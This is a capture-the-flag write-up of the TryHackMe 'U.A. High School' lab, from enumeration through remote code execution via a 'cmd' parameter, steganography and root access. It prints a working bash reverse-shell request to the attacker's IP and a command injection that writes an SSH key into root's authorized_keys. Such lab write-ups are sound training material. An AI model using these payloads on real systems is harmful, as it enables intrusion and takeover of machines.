TryHackMe: U.A. High School
U.A. High School is an easy Tryhackme box where we start by finding a GET parameter that allows us to execute code, once in the box, we found a corrupted image that contains a user creds for then to exploit a vulnerable script to get root access.
Enumeration
Nmap Scan
As always, we start with an nmap scan on 10.10.17.127.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ nmap -sC -sV 10.10.17.127 -oN uahighschool.out
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-24 13:05 BST
Nmap scan report for 10.10.17.127
Host is up (0.088s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 58:2f:ec:23:ba:a9:fe:81:8a:8e:2d:d8:91:21:d2:76 (RSA)
| 256 9d:f2:63:fd:7c:f3:24:62:47:8a:fb:08:b2:29:e2:b4 (ECDSA)
|_ 256 62:d8:f8:c9:60:0f:70:1f:6e:11:ab:a0:33:79:b5:5d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: U.A. High School
3517/tcp filtered 802-11-iapp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
Looking at the results, we have 2 ports open.
- 22/SSH OpenSSH - open
- 80/HTTP Apache - open
Web Server
Taking a look at the web server it seems like it’s a school web app with a bunch of .html pages.
Looking around didn’t get us anywhere as all the page where .html even the contact form at /contact.html (the form is sending the POST request to # so the data is being sent nowhere). From here, we decided to run GoBuster to enemurate for subdirectories and potentiel files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ gobuster dir -u http://10.10.17.127/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 30
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.17.127/
[+] Method: GET
[+] Threads: 30
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/.htm (Status: 403) [Size: 277]
/assets (Status: 301) [Size: 313] [--> http://10.10.17.127/assets/]
/.php (Status: 403) [Size: 277]
/. (Status: 200) [Size: 1988]
[....]
After letting it run for a while we only get assets, taking a look at http://10.10.17.127/assets/ we get blank page so my first intuition was to check if it’s a php or an html index page, taking a look at /index.html we get a 404 Not Found so we can confirm that the index was a php file.
Running GoBuster one more time on /assets/ didn’t help a lot as we did not find anything, at this point it seemed like a dead end and the only thing left is trying to figure out why there is an index.php under /assets/. After looking out for quite some time we decided to run a GET parameter fuzzing using ffuf.
At first, we didn’t get a hit from ffuf we decided to keep enumerating and BINGO! we found a Remote Code Execution using one GET parameter.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/api/objects.txt -u http://10.10.17.127/assets/index.php?FUZZ=ls -mc all -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.17.127/assets/index.php?FUZZ=ls
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/api/objects.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 0
________________________________________________
cmd [Status: 200, Size: 40, Words: 1, Lines: 1, Duration: 91ms]
:: Progress: [3132/3132] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:16] :: Errors: 0 ::
Exploitation
Reverse Shell
Curling on that GET parameter we can confirm that we have an RCE and the output is being displaying as base64 encoded text.
1
2
3
4
5
6
7
8
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ curl http://10.10.17.127/assets/index.php?cmd=ls -s
aW1hZ2VzCmluZGV4LnBocApzdHlsZXMuY3NzCg==
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ curl http://10.10.17.127/assets/index.php?cmd=ls -s | base64 -d
images
index.php
styles.css
Starting Burpsuite and catching a request we were able to get a reverse shell.
1
2
3
4
5
6
7
8
9
10
GET /assets/index.php?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/10.9.2.91/9001+0>%261" HTTP/1.1
Host: 10.10.17.127
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: PHPSESSID=29sjpa44o75057firg2tdfdqmi
Upgrade-Insecure-Requests: 1
1
2
3
4
5
6
7
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.9.2.91] from (UNKNOWN) [10.10.17.127] 41064
bash: cannot set terminal process group (794): Inappropriate ioctl for device
bash: no job control in this shell
www-data@myheroacademia:/var/www/html/assets$
User Pivoting
Looking for users on the machine we only find root and another user called deku.
1
2
3
www-data@myheroacademia:/var/www/html/assets$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
deku:x:1000:1000:deku:/home/deku:/bin/bash
Looking for any vectors to pivot to deku we found a Hidden_Content directory in /var/www, taking a look at its content we find a text file with a base64 encoded text, decoding it will give us a passphrase that we save for later.
1
2
3
4
5
6
7
8
9
www-data@myheroacademia:/var/www/Hidden_Content$ ls
passphrase.txt
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt
QWxsbWlna[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$ echo QWxsbWlna[REDACTED]
QWxsbWlna[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$ echo QWxsbWlna[REDACTED] | base64 -d
[REDACTED]
www-data@myheroacademia:/var/www/Hidden_Content$
Looking at the hint provided in the room we know that we need to look for an unused file.
Once you found a way in, be suspicious of any unused files.
Looking at images folder we can see an unused image available on the web server.
1
2
3
4
5
6
7
www-data@myheroacademia:/var/www/html$ ls
about.html admissions.html assets contact.html courses.html index.html
www-data@myheroacademia:/var/www/html$ cd assets/
www-data@myheroacademia:/var/www/html/assets$ cd images/
www-data@myheroacademia:/var/www/html/assets/images$ ls
oneforall.jpg yuei.jpg
www-data@myheroacademia:/var/www/html/assets/images$
Copying it to our host we knew it’s a deal of steganography as we got a passphrase earlier. Running file on oneforall.jpg we see that it’s a binary file and exiftool tells us that it’s a PNG file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ file oneforall.jpg
oneforall.jpg: data
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ exiftool oneforall.jpg.1
ExifTool Version Number : 12.76
File Name : oneforall.jpg.1
Directory : .
File Size : 98 kB
File Modification Date/Time : 2023:07:09 17:42:05+01:00
File Access Date/Time : 2024:08:24 14:37:22+01:00
File Inode Change Date/Time : 2024:08:24 14:37:22+01:00
File Permissions : -rw-rw-r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Warning : PNG image did not start with IHDR
Looking to the file signature using hexeditor as well we can see that it has a PNG signature.
So now, we need to change the file signature as steghide doesn’t support PNGs, for that, looking over google we find a list of file signatures on wikipedia, trying different JPG/JPEG signatures we got one that steghide supports.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ hexeditor oneforall.jpg
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ steghide extract -sf oneforall.jpg
Enter passphrase:
wrote extracted data to "creds.txt".
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ ls
creds.txt oneforall.jpg uahighschool.out
┌──(Str4ngerX㉿Voldemort)-[~/Desktop/TryHackMe/UAHighSchool]
└─$ cat creds.txt
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:
deku:[REDACTED]
logging into the deku account through SSH we were able to retrieve the user.txt file.
1
2
3
4
5
deku@myheroacademia:~$ ls
user.txt
deku@myheroacademia:~$ cat user.txt
THM{REDACTED}
deku@myheroacademia:~$
Privilege Escalation
Looking for sudo permissions we found one.
1
2
3
4
5
6
7
deku@myheroacademia:~$ sudo -l
[sudo] password for deku:
Matching Defaults entries for deku on myheroacademia:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User deku may run the following commands on myheroacademia:
(ALL) /opt/NewComponent/feedback.sh
Taking a look at the bash script we see a potential command injection with some sanitation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#!/bin/bash
echo "Hello, Welcome to the Report Form "
echo "This is a way to report various problems"
echo " Developed by "
echo " The Technical Department of U.A."
echo "Enter your feedback:"
read feedback
if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
echo "It is This:"
eval "echo $feedback"
echo "$feedback" >> /var/log/feedback.txt
echo "Feedback successfully saved."
else
echo "Invalid input. Please provide a valid input."
fi
After trying many command injection payloads from Hacktricks we didn’t succeed getting a shell or reading root files. Trying a simple payload to write to a file we got it working!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
test > /tmp/test
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ ls /tmp
snap-private-tmp
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-apache2.service-7Gq6Bg
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-ModemManager.service-f0J9Zf
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-logind.service-ggDZJi
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-resolved.service-8bvSTi
systemd-private-c3c01a95a79c406ab32c063bdd7d6104-systemd-timesyncd.service-kG3c1f
test
deku@myheroacademia:~$ cat /tmp/test
test
deku@myheroacademia:~$ ls -la /tmp/test
-rw-r--r-- 1 root root 5 Aug 24 14:05 /tmp/test
So using test > /tmp/test we get the file created by root with test as its content, having that in mind we came with the idea of copying our ssh public key to the root .ssh/authorized_keys file and it worked!
1
2
3
4
5
6
7
8
9
10
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form
This is a way to report various problems
Developed by
The Technical Department of U.A.
Enter your feedback:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDcOjphbiW1Rut/AIrfW6YxkGKHl6ww1fFjRnk9MiOvFMDoqkn5xFbwpNYjS9jJAXJZtkmVTPoPfpskRa0TiEFTkAXSsShNuhsTesNt8t1XWRg8zbwTf1vpOiPh84852QjdB9QBZsQU1BAq0LlaTf5f1wTiNwD1wxeHQdTa7PblCAUonGcDDGEeAwSU3TPsoyk8XbULgWcYg4wn4XbjPvaoywTDKLLoY3UGfTiF8TsSYkqD3MvtEIkDozFmNLr3RIp2ryF78bPjgLyY6h+2GoYKt/x4g4YXPV/WL09JeZnUEXk/MYPC9mANX8JIUZuf4AQH748XNXemTidhWss6mho3Eh037yK6eUI7v9JmEmfdq5zun5Jclfe6c03IVLNEVdMdE8E8FjtK4KPTUFcyz7uFXILs5a9aJqJssSIG6wpWOLKIl/xYZ+1QcvdGrJX+1y1/vWJGBw4gPRQxW/7EsAGEsyBK00qes/OxscKX4BqjWFeAcVOIvujROVunWWIdfd0= Str4ngerX@Voldemort > /root/.ssh/authorized_keys
It is This:
Feedback successfully saved.
deku@myheroacademia:~$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@myheroacademia:~# ls
root.txt snap
root@myheroacademia:~# cat root.txt
root@myheroacademia:/opt/NewComponent# cat /root/root.txt
__ __ _ _ _ _____ _
\ \ / /__ _ _ / \ _ __ ___ | \ | | _____ __ |_ _| |__ ___
\ V / _ \| | | | / _ \ | '__/ _ \ | \| |/ _ \ \ /\ / / | | | '_ \ / _ \
| | (_) | |_| | / ___ \| | | __/ | |\ | (_) \ V V / | | | | | | __/
|_|\___/ \__,_| /_/ \_\_| \___| |_| \_|\___/ \_/\_/ |_| |_| |_|\___|
_ _
_ _ ___ | | | |
| \ | | ___ / | | |__| | ___ _ __ ___
| \| |/ _ \/_/| | | __ |/ _ \ '__|/ _ \
| |\ | (_) __| |_ | | | | __/ | | (_) |
|_| \_|\___/|______| |_| |_|\___|_| \___/
THM{REDACTED}
root@myheroacademia:~#
And that’s it! we rooted the box with success!